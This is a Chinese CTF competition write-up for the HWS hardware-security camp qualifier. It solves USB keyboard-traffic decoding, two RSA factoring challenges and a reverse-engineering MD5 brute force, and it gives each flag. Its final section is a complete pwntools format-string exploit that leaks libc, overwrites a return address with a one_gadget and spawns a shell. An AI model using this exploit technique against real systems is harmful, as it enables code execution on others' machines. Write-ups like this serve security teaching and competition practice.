HWS第七期夏令营(硬件安全营)预选赛wp
MISC
USB
是个usb流量包
发现是6字节数据,键盘是8字节 鼠标是4字节,说明这不是说明重点,再往下面找,有HID Data
这里是8字节的 猜测这就是键盘流量,全部导出后加冒号,方便查看
#!/usr/bin/env python
# -*- coding:utf-8 -*-
normalKeys = {
"04": "a", "05": "b", "06": "c", "07": "d", "08": "e", "09": "f", "0a": "g", "0b": "h", "0c": "i", "0d": "j",
"0e": "k", "0f": "l", "10": "m", "11": "n", "12": "o", "13": "p", "14": "q", "15": "r", "16": "s", "17": "t",
"18": "u", "19": "v", "1a": "w", "1b": "x", "1c": "y", "1d": "z", "1e": "1", "1f": "2", "20": "3", "21": "4",
"22": "5", "23": "6", "24": "7", "25": "8", "26": "9", "27": "0", "28": "<RET>", "29": "<ESC>", "2a": "<DEL>",
"2b": "\t", "2c": "<SPACE>", "2d": "-", "2e": "=", "2f": "[", "30": "]", "31": "\\", "32": "<NON>", "33": ";",
"34": "'", "35": "<GA>", "36": ",", "37": ".", "38": "/", "39": "<CAP>", "3a": "<F1>", "3b": "<F2>", "3c": "<F3>",
"3d": "<F4>", "3e": "<F5>", "3f": "<F6>", "40": "<F7>", "41": "<F8>", "42": "<F9>", "43": "<F10>", "44": "<F11>",
"45": "<F12>"
}
shiftKeys = {
"04": "A", "05": "B", "06": "C", "07": "D", "08": "E", "09": "F", "0a": "G", "0b": "H", "0c": "I", "0d": "J",
"0e": "K", "0f": "L", "10": "M", "11": "N", "12": "O", "13": "P", "14": "Q", "15": "R", "16": "S", "17": "T",
"18": "U", "19": "V", "1a": "W", "1b": "X", "1c": "Y", "1d": "Z", "1e": "!", "1f": "@", "20": "#", "21": "$",
"22": "%", "23": "^", "24": "&", "25": "*", "26": "(", "27": ")", "28": "<RET>", "29": "<ESC>", "2a": "<DEL>",
"2b": "\t", "2c": "<SPACE>", "2d": "_", "2e": "+", "2f": "{", "30": "}", "31": "|", "32": "<NON>", "33": "\"",
"34": ":", "35": "<GA>", "36": "<", "37": ">", "38": "?", "39": "<CAP>", "3a": "<F1>", "3b": "<F2>", "3c": "<F3>",
"3d": "<F4>", "3e": "<F5>", "3f": "<F6>", "40": "<F7>", "41": "<F8>", "42": "<F9>", "43": "<F10>", "44": "<F11>",
"45": "<F12>"
}
output = []
keys = open('out.txt')
for line in keys:
try:
if line[0] != '0' or (line[1] != '0' and line[1] != '2') or line[3] != '0' or line[4] != '0' or line[9] != '0' or line[10] != '0' or line[12] != '0' or line[13] != '0' or line[15] != '0' or line[16] != '0' or line[18] != '0' or line[19] != '0' or line[21] != '0' or line[22] != '0' or line[6:8] == "00":
continue
if line[6:8] in normalKeys.keys():
output += [normalKeys[line[6:8]], shiftKeys[line[6:8]]][line[1] == '2']
else:
output += ['[unknown]']
except:
pass
keys.close()
flag = 0
print("".join(output))
for i in range(len(output)):
try:
a = output.index('<DEL>')
del output[a]
del output[a - 1]
except:
pass
for i in range(len(output)):
try:
if output[i] == "<CAP>":
flag += 1
output.pop(i)
if flag == 2:
flag = 0
if flag != 0:
output[i] = output[i].upper()
except:
pass
print('output: ' + "".join(output))
github上的解密脚本,解码后
猜测是base85解密 问题是解密失败,再看一下导出的HID Data,发现流量中有20开头的,这个20开头的也算是shiftKeys。添加条件输出后
flag{ec1b8b96-56a9-f15c-4e39-503e92ab45d2}
CRYPTO
RSA
和2022年强网杯题目factor类似
from sage.all import *
def s(m1, m2, N, e, C):
PR.<x> = PolynomialRing(Zmod(N))
m1, m2 = int(m1), int(m2)
r = 7
beta = 1/(r+1)
idx = (r*(r-1)) / ((r+1)*(r+1))
kbits = int(2048*idx)//2
f = m1*m2*x-(m2-m1)
x = f.monic().small_roots(X=2**kbits, beta=beta)[0]
equ = m1*m2*x-(m2-m1)
g = gcd(equ, N)
p = int(g)^(1/(r-1))
assert N%p == 0
q = N//p^r
assert N%q == 0
phi = p^(r-1)*(p-1)*(q-1)
d = inverse_mod(e, phi)
m = pow(C, d, N)
return m
b = s(e1,e2,N,e,C)
print(bytes.fromhex(hex(b)[2:]))
random
思路是去爆破这个这个左移的位数,然后按照题目中生成素数的思路来。用 n 是否可以整除那个素数来判断是不是正确的素数,多开几个终端,爆破了 6 分钟之后出来了所有素数,顺便把 base 也爆破出来了
from Crypto.Util.number import *
from gmpy2 import *
from tqdm import *
n = 255550794734774347335455038653204099810524562323968101081052744238324333979282590769066826059535810339765419405089707653972316828518446466787073982991340735273047955757161722774546888128720663627716647123110956021905275918358574092054477588935546729192812379266210918802470144452212508255209922150559524376661512464064852413804511191503030046546647554981646983220695416838829085308878177824361071544916728725428437436959573167863053126718594118224053088660739173865895266537548733106779437480905737491231720771570860988017959907437998012442781279100256862684919251885437194156545435396952798548033193683684362049646718627530076461463826459504520525895649547513376441325848313193080013281816762156916219271109726593135112626577858906494025788770088106285316571255392298608980679161123528759865796345121056864973189231253364595956642612401745212207858555858704724770456899071144650909246822311039572915447866615638976747716646382091135281119109866295649034560378368202797914202112090339159898226929176034503535419893300159083361891627300767030933209665917744361038219820997348160094737332979677839131999258559999565207302339242257832022939036526481610130970477187338439181123984340269665409009894192138483254592729253191096427332283419085864095600303323775372526431524911842065699875575955728772820558157791292247976982470646890930951250598649964200733076634093613078091713383782021194766013790646324780327618195433827227105459480409797466859653960886570869469172506894631937612508518886406112758352094014377947728184352908630672750330561369500089138179794848896959683336195170519521
p_list = []
#for i in tqdm(range(128,256)):
base = 1 << 175
for j in trange(0,500000):
p = int(next_prime(base + j))
if n % p == 0:
#print(f'base={base}\n')
if p not in p_list:
p_list.append(p)
print(f'p={p}')
print(p_list)
#base=47890485652059026823698344598447161988085597568237568
'''
p=47890485652059026823698344598447161988085597568251161
p=47890485652059026823698344598447161988085597568297951
p=47890485652059026823698344598447161988085597568338059
p=47890485652059026823698344598447161988085597568363667
p=47890485652059026823698344598447161988085597568398337
p=47890485652059026823698344598447161988085597568433917
p=47890485652059026823698344598447161988085597568484111
p=47890485652059026823698344598447161988085597568667099
p=47890485652059026823698344598447161988085597568729849
'''
用 n % (int(p)**int(j)) 来判断 p 是 n 的几次幂,如果余数不为 0 那么循环的 j 就是几次幂。将 p_list[i] ** mi[i] 添加到一个新列表,后面添加判断相乘是否为 n 。
from threading import Thread
from tqdm import *
from gmpy2 import *
n = 255550794734774347335455038653204099810524562323968101081052744238324333979282590769066826059535810339765419405089707653972316828518446466787073982991340735273047955757161722774546888128720663627716647123110956021905275918358574092054477588935546729192812379266210918802470144452212508255209922150559524376661512464064852413804511191503030046546647554981646983220695416838829085308878177824361071544916728725428437436959573167863053126718594118224053088660739173865895266537548733106779437480905737491231720771570860988017959907437998012442781279100256862684919251885437194156545435396952798548033193683684362049646718627530076461463826459504520525895649547513376441325848313193080013281816762156916219271109726593135112626577858906494025788770088106285316571255392298608980679161123528759865796345121056864973189231253364595956642612401745212207858555858704724770456899071144650909246822311039572915447866615638976747716646382091135281119109866295649034560378368202797914202112090339159898226929176034503535419893300159083361891627300767030933209665917744361038219820997348160094737332979677839131999258559999565207302339242257832022939036526481610130970477187338439181123984340269665409009894192138483254592729253191096427332283419085864095600303323775372526431524911842065699875575955728772820558157791292247976982470646890930951250598649964200733076634093613078091713383782021194766013790646324780327618195433827227105459480409797466859653960886570869469172506894631937612508518886406112758352094014377947728184352908630672750330561369500089138179794848896959683336195170519521
p_list = [47890485652059026823698344598447161988085597568251161, 47890485652059026823698344598447161988085597568297951, 47890485652059026823698344598447161988085597568338059, 47890485652059026823698344598447161988085597568363667, 47890485652059026823698344598447161988085597568398337, 47890485652059026823698344598447161988085597568433917, 47890485652059026823698344598447161988085597568484111, 47890485652059026823698344598447161988085597568667099, 47890485652059026823698344598447161988085597568729849]
mi = []
for p in p_list:
for j in range(1,6):
if n % (int(p)**int(j)) != 0:
print(f'p{p_list.index(p)}的幂为:{j-1}')
mi.append(j-1)
break
elif j==5:
print(f'p{p_list.index(p)}的幂为:{j}')
mi.append(j)
break
print(mi)
check = 1
for i in range(len(mi)):
check *= p_list[i] ** mi[i]
print(check - n)
最后一部分把 e 的公因数 108 去除之后用 sage 的 nth_root 直接开根即可,爆破大概7分钟。
from threading import Thread
from tqdm import *
from gmpy2 import *
from functools import reduce
from Crypto.Util.number import *
c = 29259244746260903447574448389058952310000390135231599667104954615635954705912759181552349897154663199516384757779582324312559110410628822220097857204989378367616522573650610718867075518776621505865327181301059226036067398269476892575801933638458560523584293063843890012581096233699743704556897984235725492806550009731913445801481786988321848320254380607620726887530437151238556482879159888862341096974129499878601309077513908335631417136332585391767849651968095851808312565329858938394084369711172343300695636449663297542069122814607488273607842533010193498547579501368165500427762712900139188279259336486273788664239339542187191374015805659616093967428577968683677885747775540903578723024681500272919689849253480672194507905399890280339044782040395397922973935735424691828624724029439840506402735626398047317544972966643810550593849196291833043243448655939654884418027006572740130515844853007135331296523599052132266288322473865775521953742444721612389547052020839760259179074124960827686670217980159612966767064088131176654212504654177367329044762238432531402899949096987765334061101859346928585114984440559379578507872401025874782849854603895110182401204202962118890563473961321104811452539667609870771280348801335004559132482743318366689808669972965573335905879806817618597010442262336079838039317609336210571773187461470707420797827741277982208089496339300646565067740673242728353659143107970717482392927903021102141779217003523105389389513154792904745687959335115429159530013641777064904216646895961910784920181748841104318013067029395394948190384737300533803009402182800702
n = 255550794734774347335455038653204099810524562323968101081052744238324333979282590769066826059535810339765419405089707653972316828518446466787073982991340735273047955757161722774546888128720663627716647123110956021905275918358574092054477588935546729192812379266210918802470144452212508255209922150559524376661512464064852413804511191503030046546647554981646983220695416838829085308878177824361071544916728725428437436959573167863053126718594118224053088660739173865895266537548733106779437480905737491231720771570860988017959907437998012442781279100256862684919251885437194156545435396952798548033193683684362049646718627530076461463826459504520525895649547513376441325848313193080013281816762156916219271109726593135112626577858906494025788770088106285316571255392298608980679161123528759865796345121056864973189231253364595956642612401745212207858555858704724770456899071144650909246822311039572915447866615638976747716646382091135281119109866295649034560378368202797914202112090339159898226929176034503535419893300159083361891627300767030933209665917744361038219820997348160094737332979677839131999258559999565207302339242257832022939036526481610130970477187338439181123984340269665409009894192138483254592729253191096427332283419085864095600303323775372526431524911842065699875575955728772820558157791292247976982470646890930951250598649964200733076634093613078091713383782021194766013790646324780327618195433827227105459480409797466859653960886570869469172506894631937612508518886406112758352094014377947728184352908630672750330561369500089138179794848896959683336195170519521
p_list = [47890485652059026823698344598447161988085597568251161, 47890485652059026823698344598447161988085597568297951, 47890485652059026823698344598447161988085597568338059, 47890485652059026823698344598447161988085597568363667, 47890485652059026823698344598447161988085597568398337, 47890485652059026823698344598447161988085597568433917, 47890485652059026823698344598447161988085597568484111, 47890485652059026823698344598447161988085597568667099, 47890485652059026823698344598447161988085597568729849]
mi = []
for p in p_list:
for j in range(1,6):
if n % (int(p)**int(j)) != 0:
print(f'p{p_list.index(p)}的幂为:{j-1}')
mi.append(j-1)
break
elif j==5:
print(f'p{p_list.index(p)}的幂为:{j}')
mi.append(j)
break
print(mi)
n_list = [p_list[i] ** mi[i] for i in range(len(mi))]
#print(n_list)
print(reduce((lambda x, y: x * y), n_list) - n)
e = 57564
res=[]
for pi in n_list:
d = inverse(int(e//108),euler_phi(pi))
m = pow(c,d,pi)
res.append(Zmod(pi)(m).nth_root(108, all=True))
print(res)
import itertools
for vc in itertools.product(*res):
_c = [int(x) for x in vc]
m = long_to_bytes(int(crt(_c, n_list)))
if b"flag" in m:
print(m)
#flag{U_ar3_The_K1ng_oF_rand0m_kin9Dom!}
REVERSE
animals
拖进ida可以看到有很多花(总结了一下,共有两种花),反编译也不是很好看
对两种花指令写脚本批量化去掉
start_add = 0x400800
end_add = 0x406e22
for i in range(start_add,end_add):
if get_wide_dword(i) == 0x08750a74:
patch_dword(i,0x90909090)
patch_dword(i+4,0x90909090)
patch_dword(i+8,0x90909090)
elif get_wide_dword(i) == 0x13751574:
patch_dword(i,0x90909090)
patch_dword(i+4,0x90909090)
patch_dword(i+8,0x90909090)
patch_dword(i+12,0x90909090)
patch_dword(i+16,0x90909090)
patch_word(i+20,0x9090)
patch_byte(i+22,0x90)
之后继续修复,发现直接用快捷键p创建函数依然会爆红,原因是ida对main函数的范围反编译错误,手动编辑main函数
main函数大概意思是选择正确的动物,然后对选项进行一些操作,包括位运算和md5,md5加密的链接变量被修改过
可以看得到动物比较少,所以这个题可以直接爆破md5
#include <stdio.h>
#include <stdlib.h>
#include <stdbool.h>
#include <time.h>
#include <windows.h>
#include <stdint.h>
#include <string.h>
#include "md5.h"
using namespace std;
typedef int status;
typedef int selemtype;
char choices[][10] = {
"cat",
"dog",
"fox",
"panda",
"dragon",
"monkey"
};
unsigned char answer[] = {
0xCB, 0xA4, 0x7B, 0xE5, 0xF0, 0x1C, 0xD1, 0x95, 0x5C, 0x85,
0x46, 0xA2, 0xB2, 0x4F, 0xBD, 0x18
};
int main() {
MD5_CTX md5;
unsigned char md5_str[32] = { 0 };
int length = 9;
int choice[9];
for (int i = 0; i < 9; i++) {
choice[i] = 0;
}
while (1) {
char animalName[9 * 10 + 1];
int index = 0;
for (int i = 0; i < 9; i++) {
int choiceIndex = choice[i];
char* animal = choices[choiceIndex];
while (*animal != '\0') {
animalName[index] = *animal;
animal++;
index++;
}
}
animalName[index] = '\0';
for (int i = 0; i < 16; i++)
{
md5_str[i] = 0;
}
MD5Init(&md5);
MD5Update(&md5, (unsigned char*)animalName, strlen((char*)animalName));
MD5Final(&md5, (unsigned char*)md5_str);
for (int i = 0; i < 16; i++) {
md5_str[i] = (md5_str[i] & 0xE9 | ~md5_str[i] & 0x16);
}
for (int i = 0; i < 16; i++)
{
if (md5_str[i] != answer[i])
{
break;
}
if (i > 5)
{
printf("%s", animalName);
return 0;
}
}
// 更新选择索引
int i = length - 1;
while (i >= 0 && choice[i] == 5) {
choice[i] = 0;
i--;
}
if (i < 0) {
break;
}
choice[i]++;
}
return 0;
}
#pragma once
#ifndef MD5_H
#define MD5_H
typedef struct
{
unsigned int count[2];
unsigned int state[4];
unsigned char buffer[64];
}MD5_CTX;
#define F(x,y,z) ((x & y) | (~x & z))
#define G(x,y,z) ((x & z) | (y & ~z))
#define H(x,y,z) (x^y^z)
#define I(x,y,z) (y ^ (x | ~z))
#define ROTATE_LEFT(x,n) ((x << n) | (x >> (32-n)))
#define FF(a,b,c,d,x,s,ac) \
{ \
a += F(b,c,d) + x + ac; \
a = ROTATE_LEFT(a,s); \
a += b; \
}
#define GG(a,b,c,d,x,s,ac) \
{ \
a += G(b,c,d) + x + ac; \
a = ROTATE_LEFT(a,s); \
a += b; \
}
#define HH(a,b,c,d,x,s,ac) \
{ \
a += H(b,c,d) + x + ac; \
a = ROTATE_LEFT(a,s); \
a += b; \
}
#define II(a,b,c,d,x,s,ac) \
{ \
a += I(b,c,d) + x + ac; \
a = ROTATE_LEFT(a,s); \
a += b; \
}
void MD5Init(MD5_CTX* context);
void MD5Update(MD5_CTX* context, unsigned char* input, unsigned int inputlen);
void MD5Final(MD5_CTX* context, unsigned char digest[16]);
void MD5Transform(unsigned int state[4], unsigned char block[64]);
void MD5Encode(unsigned char* output, unsigned int* input, unsigned int len);
void MD5Decode(unsigned int* output, unsigned char* input, unsigned int len);
#endif
#include <memory.h>
unsigned char PADDING[] = { 0x80,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 };
void MD5Init(MD5_CTX* context)
{
context->count[0] = 0;
context->count[1] = 0;
context->state[0] = 0xEFCDAB89;
context->state[1] = 0x67452301;
context->state[2] = 0x10325476;
context->state[3] = 0x98BADCFE;
}
void MD5Update(MD5_CTX* context, unsigned char* input, unsigned int inputlen)
{
unsigned int i = 0, index = 0, partlen = 0;
index = (context->count[0] >> 3) & 0x3F;
partlen = 64 - index;
context->count[0] += inputlen << 3;
if (context->count[0] < (inputlen << 3))
context->count[1]++;
context->count[1] += inputlen >> 29;
if (inputlen >= partlen)
{
memcpy(&context->buffer[index], input, partlen);
MD5Transform(context->state, context->buffer);
for (i = partlen; i + 64 <= inputlen; i += 64)
MD5Transform(context->state, &input[i]);
index = 0;
}
else
{
i = 0;
}
memcpy(&context->buffer[index], &input[i], inputlen - i);
}
void MD5Final(MD5_CTX* context, unsigned char digest[16])
{
unsigned int index = 0, padlen = 0;
unsigned char bits[8];
index = (context->count[0] >> 3) & 0x3F;
padlen = (index < 56) ? (56 - index) : (120 - index);
MD5Encode(bits, context->count, 8);
MD5Update(context, PADDING, padlen);
MD5Update(context, bits, 8);
MD5Encode(digest, context->state, 16);
}
void MD5Encode(unsigned char* output, unsigned int* input, unsigned int len)
{
unsigned int i = 0, j = 0;
while (j < len)
{
output[j] = input[i] & 0xFF;
output[j + 1] = (input[i] >> 8) & 0xFF;
output[j + 2] = (input[i] >> 16) & 0xFF;
output[j + 3] = (input[i] >> 24) & 0xFF;
i++;
j += 4;
}
}
void MD5Decode(unsigned int* output, unsigned char* input, unsigned int len)
{
unsigned int i = 0, j = 0;
while (j < len)
{
output[i] = (input[j]) |
(input[j + 1] << 8) |
(input[j + 2] << 16) |
(input[j + 3] << 24);
i++;
j += 4;
}
}
void MD5Transform(unsigned int state[4], unsigned char block[64])
{
unsigned int a = state[0];
unsigned int b = state[1];
unsigned int c = state[2];
unsigned int d = state[3];
unsigned int x[64];
MD5Decode(x, block, 64);
FF(a, b, c, d, x[0], 7, 0xd76aa478); /* 1 */
FF(d, a, b, c, x[1], 12, 0xe8c7b756); /* 2 */
FF(c, d, a, b, x[2], 17, 0x242070db); /* 3 */
FF(b, c, d, a, x[3], 22, 0xc1bdceee); /* 4 */
FF(a, b, c, d, x[4], 7, 0xf57c0faf); /* 5 */
FF(d, a, b, c, x[5], 12, 0x4787c62a); /* 6 */
FF(c, d, a, b, x[6], 17, 0xa8304613); /* 7 */
FF(b, c, d, a, x[7], 22, 0xfd469501); /* 8 */
FF(a, b, c, d, x[8], 7, 0x698098d8); /* 9 */
FF(d, a, b, c, x[9], 12, 0x8b44f7af); /* 10 */
FF(c, d, a, b, x[10], 17, 0xffff5bb1); /* 11 */
FF(b, c, d, a, x[11], 22, 0x895cd7be); /* 12 */
FF(a, b, c, d, x[12], 7, 0x6b901122); /* 13 */
FF(d, a, b, c, x[13], 12, 0xfd987193); /* 14 */
FF(c, d, a, b, x[14], 17, 0xa679438e); /* 15 */
FF(b, c, d, a, x[15], 22, 0x49b40821); /* 16 */
/* Round 2 */
GG(a, b, c, d, x[1], 5, 0xf61e2562); /* 17 */
GG(d, a, b, c, x[6], 9, 0xc040b340); /* 18 */
GG(c, d, a, b, x[11], 14, 0x265e5a51); /* 19 */
GG(b, c, d, a, x[0], 20, 0xe9b6c7aa); /* 20 */
GG(a, b, c, d, x[5], 5, 0xd62f105d); /* 21 */
GG(d, a, b, c, x[10], 9, 0x2441453); /* 22 */
GG(c, d, a, b, x[15], 14, 0xd8a1e681); /* 23 */
GG(b, c, d, a, x[4], 20, 0xe7d3fbc8); /* 24 */
GG(a, b, c, d, x[9], 5, 0x21e1cde6); /* 25 */
GG(d, a, b, c, x[14], 9, 0xc33707d6); /* 26 */
GG(c, d, a, b, x[3], 14, 0xf4d50d87); /* 27 */
GG(b, c, d, a, x[8], 20, 0x455a14ed); /* 28 */
GG(a, b, c, d, x[13], 5, 0xa9e3e905); /* 29 */
GG(d, a, b, c, x[2], 9, 0xfcefa3f8); /* 30 */
GG(c, d, a, b, x[7], 14, 0x676f02d9); /* 31 */
GG(b, c, d, a, x[12], 20, 0x8d2a4c8a); /* 32 */
/* Round 3 */
HH(a, b, c, d, x[5], 4, 0xfffa3942); /* 33 */
HH(d, a, b, c, x[8], 11, 0x8771f681); /* 34 */
HH(c, d, a, b, x[11], 16, 0x6d9d6122); /* 35 */
HH(b, c, d, a, x[14], 23, 0xfde5380c); /* 36 */
HH(a, b, c, d, x[1], 4, 0xa4beea44); /* 37 */
HH(d, a, b, c, x[4], 11, 0x4bdecfa9); /* 38 */
HH(c, d, a, b, x[7], 16, 0xf6bb4b60); /* 39 */
HH(b, c, d, a, x[10], 23, 0xbebfbc70); /* 40 */
HH(a, b, c, d, x[13], 4, 0x289b7ec6); /* 41 */
HH(d, a, b, c, x[0], 11, 0xeaa127fa); /* 42 */
HH(c, d, a, b, x[3], 16, 0xd4ef3085); /* 43 */
HH(b, c, d, a, x[6], 23, 0x4881d05); /* 44 */
HH(a, b, c, d, x[9], 4, 0xd9d4d039); /* 45 */
HH(d, a, b, c, x[12], 11, 0xe6db99e5); /* 46 */
HH(c, d, a, b, x[15], 16, 0x1fa27cf8); /* 47 */
HH(b, c, d, a, x[2], 23, 0xc4ac5665); /* 48 */
/* Round 4 */
II(a, b, c, d, x[0], 6, 0xf4292244); /* 49 */
II(d, a, b, c, x[7], 10, 0x432aff97); /* 50 */
II(c, d, a, b, x[14], 15, 0xab9423a7); /* 51 */
II(b, c, d, a, x[5], 21, 0xfc93a039); /* 52 */
II(a, b, c, d, x[12], 6, 0x655b59c3); /* 53 */
II(d, a, b, c, x[3], 10, 0x8f0ccc92); /* 54 */
II(c, d, a, b, x[10], 15, 0xffeff47d); /* 55 */
II(b, c, d, a, x[1], 21, 0x85845dd1); /* 56 */
II(a, b, c, d, x[8], 6, 0x6fa87e4f); /* 57 */
II(d, a, b, c, x[15], 10, 0xfe2ce6e0); /* 58 */
II(c, d, a, b, x[6], 15, 0xa3014314); /* 59 */
II(b, c, d, a, x[13], 21, 0x4e0811a1); /* 60 */
II(a, b, c, d, x[4], 6, 0xf7537e82); /* 61 */
II(d, a, b, c, x[11], 10, 0xbd3af235); /* 62 */
II(c, d, a, b, x[2], 15, 0x2ad7d2bb); /* 63 */
II(b, c, d, a, x[9], 21, 0xeb86d391); /* 64 */
state[0] += a;
state[1] += b;
state[2] += c;
state[3] += d;
}
具体思路为:用动物名字加密,然后变异的md5加密后和密文比较,如果比较成功就是对的动物名字,用这个名字的序号再加密md5
flag{839c998c52db6618bb24c346b85a894f}
PWN
fmt
from pwn import *
import sys
remote_addr = ["123.60.179.52",30207]
libc = ELF('./libc.so.6')
context.log_level="debug"
p = process("./fmt_patched")
context(arch='amd64', os='linux')
context.terminal = ['tmux', 'splitw', '-h']
context.log_level="debug"
r = lambda : p.recv()
rl = lambda : p.recvline()
rc = lambda x: p.recv(x)
ru = lambda x: p.recvuntil(x)
rud = lambda x: p.recvuntil(x, drop=True)
s = lambda x: p.send(x)
sl = lambda x: p.sendline(x)
sa = lambda x, y: p.sendafter(x, y)
sla = lambda x, y: p.sendlineafter(x, y)
shell = lambda : p.interactive()
pr = lambda name,x : log.info(name+':'+hex(x))
payload = b'%8$p.%18$p'
sla(b'str: ', payload)
libc.address = int(rc(14), 16) - 0x1e94a0
ru(b'.')
ret_addr = int(rc(14), 16) - 8
one = libc.address + 0xe3b01
pr('libc.address', libc.address)
pr('one', one)
d1 = ((one >> 32) & 0xffff) - ((one >> 16) & 0xffff)
d2 = (one & 0xffff) - ((one >> 32) & 0xffff)
payload = b"%" + str((one >> 16) & 0xffff).encode() + b"c%11$hn"
payload += b"%" + str(d1).encode() + b"c%12$hn"
payload += b"%" + str(d2).encode() + b"c%13$hn"
payload = payload.ljust(0x28, b'a')
payload += p64(ret_addr + 2)
payload += p64(ret_addr + 4)
payload += p64(ret_addr)
sla("str: ", payload)
shell()
